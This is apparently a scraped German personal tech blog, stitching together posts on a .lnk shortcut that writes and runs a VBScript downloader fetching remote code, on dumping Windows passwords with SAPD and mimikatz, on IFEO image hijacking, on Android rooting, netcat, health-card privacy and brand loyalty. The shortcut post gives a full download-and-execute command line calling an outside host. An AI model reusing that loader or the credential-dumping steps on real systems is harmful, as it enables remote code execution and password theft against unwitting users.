Unter Windows sind .lnk Dateien Verknüpfungen auf ein anderes Dateisystemobjekt. Man kann in diesen Linkdateien Beispielsweise auf die cmd.exe linken. Als Ziel wäre dann wahrscheinlich so etwas definiert: C:\Windows\System32\cmd.exe

Als ich mir eine Verknüpfung auf psexec machte probierte ich aus ob man da auch ohne weiteres Parameter mit Anhängen kann. Wer hätte es gedacht - es geht. Das brachte mich auf die Idee zu versuchen über ein Link, Code auszuführen. Warum also nicht per CMD /c den Code in ein Scripts Pipen und starten? Der Code müsste etwa so aussehen:

1
2
3
4

SET http=CreateObject("MSXML2.XMLHTTP.3.0")
SET http.open "GET","http://geekhost.de/downloads/messagebox.txt",False
http.Send
execute http.responseText

Diese Code muss jetzt nur noch passend verpackt werden damit er zeilenweise über die cmd.exe in ein vbs gepipt werden kann. Zur besseren Übersicht hier mit Absätzen:

1
2
3
4
5
6
7
8
9
10

%windir%\system32\cmd.exe /c
echo SET http=CreateObject("Microsoft.MSXML2.XMLHTTP.3.0")
>> d.vbs&
echo http.open "GET","http://geekhost.de/downloads/messagebox.txt",False
>> d.vbs&
echo http.Send
>> d.vbs&
echo Execute http.responseText
>> d.vbs&
start d.vbs

Ein PoC könnt ihr euch hier anschauen.

Nette Sache :)

Wir haben zufällig zwei Tools im Netz gefunden die helfen vergessene Windows Passwörter wiederherzustellen. Das wäre einmal SAPD für Serviceaccounts hinter einem NT Service und dann noch der Alleskönner mimikatz.

SAPD - Passwörter von Service Accounts

Wenn man mal das Passwort für ein Service Account vergessen hat - kein Problem. Solang der Service noch registriert ist, kann man das Passwort ohne weiteres wieder auslesen. Doof ist es nur wenn jemand so gewitzt ist und grundsätzlich seinen eigenen Benutzeraccount (z.B. Domain-Administrator) als Serviceaccount benutzt. Hier kann das Passwort natürlich auch im Klartext ausgegeben werden.

Man besorge sich also das Tool SAPD, startet es in einer Command Prompt mit den Rechten von NT AUTHORITY/SYSTEM (privilege escalation: psexec) und fügt noch den Anzeigenamen des Services als Parameter an. - Voilá.

mimikatz: Passwörter in Plain dank LSASS

…oder auch Local Security Authority Subsystem Service. Klingt wie eine Krankheit. Ist es quasi auch. mimikatz ist hier ein Multipwn. Das Programm schafft es gleich bei mehreren verschiedenen Authentifizierungsverfahren den gecachten Hash wieder zum Plain zurück zu rechnen. Ich hab das Paper auch nicht komplett nachvollziehen können, fand es aber interessant:
<iframe src=”http://fr.slideshare.net/slideshow/embed_code/15067219” width=”512” height=”421” frameborder=”0” marginwidth=”0” marginheight=”0” scrolling=”no” style=”border:1px solid #CCC;border-width:1px 1px 0;margin-bottom:5px” allowfullscreen webkitallowfullscreen mozallowfullscreen> </iframe> <div style=”margin-bottom:5px”> </div>

Offizielle Gegenmaßnahmen für diesen Verhalten gibt es von Microsoft nicht. Die Vorschläge des Programmierers von mimikatz kann man seiner Dokumentation entnehmen. Neben der Doku stellt er natürlich auch noch das Programm(bin & scr) selbst zum Download bereit.

Vor einiger Zeit habe ich mir ein knapp zwei stündiges Interview mit Dr. phil. Oliver Errichiello angeschaut. Es ging um das Thema Marke. Etwas vereinfacht dargestellt könnte man sagen das Dr. Errichiello Marken trotz ihrer Schwächen als etwas Gutes sieht. Marke sind Vorurteile. Das Wort Vorurteile hat, zumindest in meinem Sprachgefühl, eine negative Konnotation. Aber denken wir doch mal nach. Ein Vorurteil ist etwas Gutes. Ich sage auch gleich warum. Erstmal möchte ich den Artikel von xploit.me verlinken. Hat mir sehr gut gefallen und mich nach ein paar hundert Tagen auch mal wieder zum Schreiben motiviert. Danke xploit! Marken sind Vorurteile und Vorteile. Vorurteile sind Überlebenswichtig. Ich hab mich noch nie an einer Herdplatte verbrannt. Trotzdem denke ich zu wissen das es nicht angenehm ist. Ein Vorurteil. Ich urteile über Etwas bevor es geschieht und obwohl ich es selbst noch nie erfahren habe. Marken bestehen aus Vorstellung und immer gleichen Erwartungen. Diese Vorstellungen werden durch Werbung zum Bedürfnis. Jeden Tag und fast überall und zu jeder Zeit präsent, wollen Marke unsere besten Freunde sein. Oft so subtil, das man es bewusst gar nicht wahr nehmen kann.(Interessante Studie: The hidden persuaders break into the tired brain)

Eine Marke ist ein soziales System. Nehmen wir doch mal die Marke Apple. Was steckt da dahinter? Was wissen wir außer das Apple wie die meisten Computerhersteller, Menschen über Drittfirmen versklavt?

+ Edles Design

+ einfache Bedienung

+ Hochwertig verarbeitet

Und das war es mit dem Mythos Marke schon. Aber Warum campen Menschen nächtelang vor einem Apple Store? Da wird jedem Wetter getrotzt. Ob es stürmt, schneit oder Frösche regnet. Sie nehmen die ganzen Strapazen auf sich um dann nach drei Tage, und unzähligen Frostbeulen, ihr iPhone 4 gegen ein iPhone 5 tauschen können. Weil es größer ist? Schneller? Nein! “Die Konsumenten sollen Produkte und Dienstleistungen nicht mehr nur kaufen und nutzen, sondern lieben.” Es ist das Feeling. Wenn viele Menschen etwas teilen. Wenn Menschen ein eingeimpftes VORURTEILE bestätigt bekommen stimuliert das. Hier beginnt das soziale System Marke sich zu entfalten. </span>

Es scheint ja verschiedene Ausprägungen diese Wahnsinns zu geben. Bei den meisten Fanboys die ich so kenne ist es noch human. Aber dann gibt es diesen einen Typen da, oder diese eine erwachsene Frau. Sobald jemand auch nur die kleinste Kritik an ihrer gottgleichen Marke angemerkt, wird sie zum kleinen Kind. Ab diesem Zeitpunkt fangen die Fans an absolut irrational zu reagieren. Sie nehmen ihr Objekt der Begierde unter Schutz - komme was wolle. Sie stellen die Marke über sich selbst. Eine neurologische Studie kam zu dem Schluß das *Fanboy-Gehirne durch ihre präferierte Marke in der selben Weise stimuliert würden, wie es streng gläubige Menschen durch religiöse Symbole werden. Fairerweise muss man aber sagen das diese Studio nicht den Anspruch hatte repräsentativ zu sein.

Im Prinzip ist ja ein Drama. Wie ein Liebesfilm ohne Happyend. Der Partner gibt sein Herzblut für etwas absolut sinnloses, ohne das es Ihm bewusst wäre. Für die Konzerne zählt Profit oder wie xploit schön plakativ ausdrückte: “Konsumsklaven der Milliardenkonzerne”

Und bevor ich jetzt den Internet Shitstorm auf mich lenke, ziehe mal den Stecker. Außerdem macht der Apple Store gleich auf.

Heute bin ich über einen interessanten Registry Eintrag gestolpert. Ein Kollege schrieb mir im ICQ das er endlich ein Programm gefunden hätte das die Werbepopups seines kostenlosen Virenscanners Avira Antivirus blocken würde.

In dem Moment dachte ich mir erst einmal ohje… Ich bad ihn mir das Programm mal zu schicken.

Es bestand aus zwei Teilen. Eine 2kb große ausführbare Datei und eine REG-Datei. Diese Regdatei erstellt zwei Schlüssel die sich auf zwei Dateien des Virenscanners beziehen…

<img class=”center” src=”/images/posts/2012/08/Avira-Notification-Apps.png” alt=”AviraAdBlocker?”width=”100%” height=”100%”>

1

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

Als erstes habe ich ein bisschen meine Suchmaschine gequält und dann sogar einen Technet Artikel zu Image File Execution Options(IFEO). Ansonsten findet man überwiegend Logdateien von Virenscanner und ähnlichen. Das sieht erst mal nicht gut aus.

Laut dem kurzem Technet Artikel sind die Image File Execution Options ein out-of-the-box Feature von Windows. Es soll das Debuggen von startenden Prozessen vereinfachen.

Bevor also ein Prozess startet, schaut Windows erst mal in der REG nach ob ein Eintrag für diesen Prozessnamen vorhanden ist. Wenn die REG auf die Frage mit NULL antwortet läuft alles wie gewohnt. Fällt die Antwort aber anders aus wird die in der REG angegebene Anwendung gestartet. Das nennt man dann wohl Image Hijack. Mit dem Programm Autoruns von den Sysinternals ist das ganz gut zu erkennen.

<img class=”center” src=”/images/posts/2012/08/autoruns.PNG” alt=”Autoruns zeigt Image Hijacks an”width=”100%” height=”100%”>

Mit dem was ich bisher weiß, glaube ich schon zu wissen was die null.exe macht. Wie sich später gleich zeigen wird macht die Anwendung wirklich das was ich dachte - nämlich ‘nichts’ Ein Blick mit IDA in die null.exe lässt erkennen das die Anwendung nur die Main aufruft irgendwas deklariert und das dann mit return zurück gibt. Also Quasi so.

1
2
3
4
5
6

#include <Windows.h>
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmdLine, int iCmdShow);
{
    int a = 1;
    return a;
}

<img class=”center” src=”/images/posts/2012/08/IDA-die-geile-Wutz.png” alt=”null.exe - nur eine Dummydatei”width=”100%” height=”100%”>

Ich schätze mal das man die Dateien die der Erfinder hier hijackt nicht direk bearbeiten kann. Das würde dem AV wohl beim nächsten Selbsttest auffallen.

Von den Malware Badguys wird dieses Debug Feature natürlich gerne benutzt. Man kann damit Prozesse manipulieren, eigene Prozesse im Namen von anderen starten, und sogar die Ausführung von Anwendungen komplett blockieren. Gerade AV Prozesse sowie Systemprogramme wie regedit oder taskmgr stehen da wohl ganz hoch im Kurs. Laut den vielen AV Logdateien im Netz werden wohl gerne die eben erwähnten Prozesse mit dem der Systemdatei svchost.exe gehijackt. Diese Anwendung startet und hält normalerweise Systemservices. Das aber nur wenn man Sie mit bestimmten Parametern füttert. Ist das nicht der Fall startet Sie kurz, natürlich nicht sichtbar, und beendet die Instanz wieder. Auf diesem Weg lassen sich unbemerkt Anwendungen blockieren.

Abschließend noch mal zusammenfassend: Malware kann sich hier also unerkannt mit einem out-of-the-box Feature als Debugger einer Anwendung registrieren. Von da an ist es für die Malware ein leichtes sich in den Prozess zu injecten. Ansonsten Daumen hoch für diese kreative Anwendung dieses REG Keys. Die Null.exe hätte man sich aber sparen können indem man Systemnative Anwendungen benutzt.

Microsoft sieht den Key übrigens eher als Feature und nicht als Security issue. HKLM kann ja nur mit administrativen Rechten bearbeitet werden. Wenn ein Angreifer die hätte, hätte er schon alle Macht über das System. Ab DAUs mit Adminaccounts denkt Microsoft aber nicht :)

greetz

Ich habe eine nette Android Applikation gefunden…suddenly…trolls!

Über den sogenannten Recoverymodus kann man bei vielen Handys selbst dann noch Software einspielen wenn es nicht mehr komplett bootet. So auch bei meinem ersten Androidtelefon Samsung GT-I8150W(GSW). Diesen Umstand kann man sich zu nutze machen. Mit einem modifizierte Update kann das Gerät gerootet werden. Das Update besteht aus einem ZIP Archiv und beinhaltet eine busybox + su sowie eine Android Anwendung(APK) die später die SU-Rechte verwalten wird. Zusätzlich sind noch ein paar Metainfos enthalten. Das Paket könnte ihr euch hier downloaden.

Um das Update einzuspielen muss es auf der interne SD-Karte liegen und aus dem Recoverymodus aus eingespielt werden. Um in den Recoverymodus zu kommen, muss man wärend dem Bootvorgang die “Volume Up”, “Power” und “Home” Taste gedrückt halten. Sobald das Samsung Logo aufleuchtet den Powerbutton loslassen - nur den Powerbutton.

<img class=”center” src=”/images/posts/2012/06/Samsung8150Rooten1.jpg” alt=”Recovery Modus starten”width=”70%” height=”70%”>

Vor einiger Zeit hat mir meine Krankenkasse ein Schreiben geschickt in dem Sie mich um ein Passfoto fuer die neue elektronische Gesundheitskarte(gEK) bat. Da ich mich zu dem Zeitpunkt noch nicht wirklich informiert gefuehlt habe, wurde der Brief von mir so ziemlich ignoriert. Eben habe ich die zweite Aufforderung aus dem Briefkasten gefischt. In diesem Schreiben bezieht sich die Krankenkasse auf §284 SGB V in Verbindung mit §291 SGB V und schreibt:

Der Gesetzgeber gibt vor, dass die elektronische Gesundheitskarte mit einem Bild des Versicherten […] versehen wird

Soweit so doof.

Ein kurzes ueberfliegen der Gesetze(bin da doch ein ziemlicher Laie) brachte mich dann aber zu dem Schluss das ich nicht dazu verpflichtet bin mein Foto an die Krankenkasse zu uebermitteln. Habe ich das richtig verstanden? Der Gesetzgeber schreibt lediglich den gesetzlichen Krankenkassen vor ein Foto von mir anzufordern und das der eGK mit einem Bild versehen werden muss. Das Gesetz schreibt mir als Buergern aber nicht vor dieser Bitte auch nachzukommen. Niemand in diesem Land kann mich dazu zwingen ein Foto an ein privates Unternehmen abzugeben. Besonders nicht dann, wenn das Foto

in digitaler Form bei der Krankenkasse verbleibt

Laut dem CCC waere das unzulaessig

Zwar sieht § 291 des Sozialgesetzbuches vor, dass die Versichertenkarte ein “Lichtbild des Versicherten” enthalten soll, macht aber darueber hinaus keine Vorgaben, wie es ausgestaltet sein muss. Der Kreativitaet sind also keine Grenzen gesetzt. Ein biometrisch verwertbares Fotos, wie es beim umstrittenen elektronischen Reisepass zum Einsatz kommt, ist keinesfalls gefordert. Welche Sanktionsmoeglichkeiten die Krankenkassen haben, wenn der Versicherte kein Foto einschickt, ist fraglich.
Eine Speicherung des Fotos ueber den Zeitraum der Herstellung der Karte hinaus ist gesetzlich nicht vorgeschrieben und damit unzulaessig.

Bitte kommt mir jetzt nicht mit dem Stammtischtotschlagargument - ja aber bei Facebook postest du ja auch tausenden Fotos - nein tu ich nicht!

Die Spitze des Gesundheitseisbergs

Das Foto an sich ist ja nur die Spitze des Gesundheitseisbergs. Ich finde die eGK mehr als bedenklich. Es werden im Moment zentrale Datenbanken aufgebaut und befuellt. Auf diese Datenbanken kann jeder Arzt und sogar Krankenhausmitarbeiter zugreifen. Diese Daten sind natuerlich auch nicht gegen die Manipulation Dritter geschuetzt. Wie auch? Es sind doch manipulierbare Bits und Bytes.

Weder sind die Lesegeraete fuer die Karten oder die Karten selbst schon vom BSI zertifiziert (wie es zum Beispiel die Lesegeraete fuer den neuen Personalausweis sein muessen) noch gibt es im Vorfeld eine genaue Einsicht welche Daten von mir zukuenftig erhoben werden sollen und wer faktisch auf diese Daten zugreifen kann.

Außerdem sollen auf den Karten selbst

…vertrauliche personenbezogene[..] gespeichert werden können und auch werden sollen.

Es fehlt einfach die Transparenz. Dort wo es an Transparenz mangelt liegt oft viel im argen. Reduziert man alles auf das Wesentliche hat Transparenzmangel meist nur zwei Ursachen. Verheimlichen und/oder fehlende Kompetenzen im sozialen Arbeiten. Und mal ganz ehrlich, wollt ihr Menschen die euch nicht den Respekt zollen ihr Vorhaben offen zu legen, wirklich eure hoechst sensible Daten anvertrauen? Daten die ueber eure Zukunft entscheinden koennen.

Ich hab doch eh nur Schnupfen? Zukunftsfantasien ala Orwell (Light)

Die Windows Command Prompt ist im Vergleich zur Linux Bash eher ungenügend ausgestattet, oder? (mal abgesehen von der Powershell)

Es gibt dennoch den ein oder anderen Trick um das letzte bisschen aus der Windows Prompt herraus zu kitzeln. WMIC(Windows Management Instrumentation Command-line) ist dafuer das beste Beispiel. “Microsoft-like” ist es zwar unnoetig kompliziert aber sehr hilfreich.

Ich habe zu diesem Thema ein kleines Paper verfasst, welches Ihr hier herunterladen könnt: Cheat Sheets - Windows Command Line Kung Fu <img class=”center” src=”http://zementente.github.com/images/posts/2012/05/Cheat_Sheets_WindowsCommandLineKungFu.png” alt=”Command Line Kung Fu”width=”500px” height=”170px”>

Ich habe seit langem mal wieder eine Pentest Distribution auf einem Notebook installiert und dabei fiel mit netcat direkt ins Auge. Viele nette Erinnerungen kamen hoch. Mit netcat hatten wir damals echt einiges gemacht. Irgendwo fliegt bestimmt noch der IRC Client von mir und meinen damaligem Kommilitonen rum, muss ich denn mal suchen. Najut.

netcat ist ein Klassiker unter den Computerwerkzeugen - der l0phige Programmierer nannte es damals ein Multipurpose Relay. Das beschreibt es eigentlich auch schon ganz gut.

Netcat? Dafuq ist das?

Fuer alle die, die mit dem Begriff Netcat nix anfangen koennen sei nur soviel gesagt; dieses Programm verarbeitet Datenstroemen(z.B. stdin/stdout/sderr) und bildet dabei eine offene Schnittstelle zum TCP/IP Protokoll ab.(siehe Abbildung). Dabei bleibt netcat ISO/OSI treu und stellt keine Anforderungen an die zu uebertragenden Datenstroeme. In der Manpage steht passend: “The TCP/IP Swiss army knife” :) Da netcat auf einer relativ niedrigen Netzwerkebene arbeitet bietet es dem Benutzer einen großen Freiraum in der Anwendung. Ueber die Jahrzhnte hinweg hat netcat eine grosse Fangemeinde aufgebaut.

<img class=”center” src=”http://upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Netcat_simple.svg/800px-Netcat_simple.svg.png” alt=”netcat Datenstroeme”width=”500px” height=”170px”>

Netcat wurde im laufe der Jahre immer weiter entwickelt und es entstanden immer wieder neue Tools. Ad hoc fallen mir drei Stueck ein:

auf meinem Blog hat sich einiges getan. Grunsaetzlich bin ich erstmal auf Octopress umgestiegen. Octopress wird mit dem Slogan “A blogging framework for hackers” beworben. Und irgendwie kommt das auch hin, ohne bisschen hacken kommt man hier nicht weiter.